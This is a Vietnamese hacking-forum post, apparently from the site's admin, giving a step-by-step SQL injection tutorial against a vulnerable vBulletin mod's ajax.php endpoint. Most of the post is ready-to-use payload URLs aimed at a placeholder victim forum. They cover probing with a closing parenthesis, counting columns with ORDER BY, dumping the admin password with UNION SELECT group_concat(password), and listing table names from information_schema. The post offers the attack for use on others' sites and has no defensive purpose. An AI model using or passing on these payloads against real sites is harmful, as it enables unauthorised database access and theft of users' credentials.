• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Hướng dẫn khai thác bug Changuondyu Static

Admin

Well-Known Member
Staff member
Administrator
Định không post TUT này sớm nhưng dù sao cũng có người làm hướng dẫn rồi nên post luôn cho ae.

Không hide

Chú ý là đừng mang đi phá người ta quá nhé

Ở diễn đàn có sử dụng mod changuondyu static. Ví dụ:
Code:
http://forumvictim.com/forum

Bạn truy cập vào:
Code:
http://forumvictim.com/forum/ajax.php?do=inforum&result=[COLOR=#ff0000][B]10[/B][/COLOR]&listforumid=[B][COLOR=#ff0000]123[/COLOR][/B]

2 kái chữ bôi đỏ các bạn thay cho phù hợp (Ra ngoài forum home xem victim để giá trị result như nào, listforumid thì các bạn lấy 1 id chuyên mục của victim)

Tiếp theo bạn thử thêm dấu đóng ngoặc " ) " vào sau xem, nếu nó lỗi tức là site chưa fix

HTML:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123)

Nếu đã lỗi rồi thì các bạn thực hiện order by để tìm column:

HTML:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) ORDER BY 11-- -

Bạn thay số 11 đỏ ở kia = số phù hợp, sao cho đó là số lớn nhất có thể mà khi đó ko bị lỗi (Thường thì là 10)

Giả sử mình đã tìm đc giá trị đó là 10 rồi thì tiếp theo sẽ select thôi.

HTML:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(password),3,4,5,6,7,8,9,10 FROM user WHERE userid=1-- -

(Bạn có thể thử thay cái group_concat vào các số 6 hay 7 để hiển thị đc kquả tốt nhất)

Nếu xảy ra lỗi thì có thể forum này họ để VBB TABLE PREFIX, tức là table của họ ko phải dạng user nữa mà là kiểu như dct_user chẳng hạn, lúc này ta tìm tên table = cách:

HTML:
http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables-- -

=> Xem tiền tố table là gì rồi bắt đầu khai thác

Nguồn: DAICA
 

Facebook Comments

New posts New threads New resources

Back
Top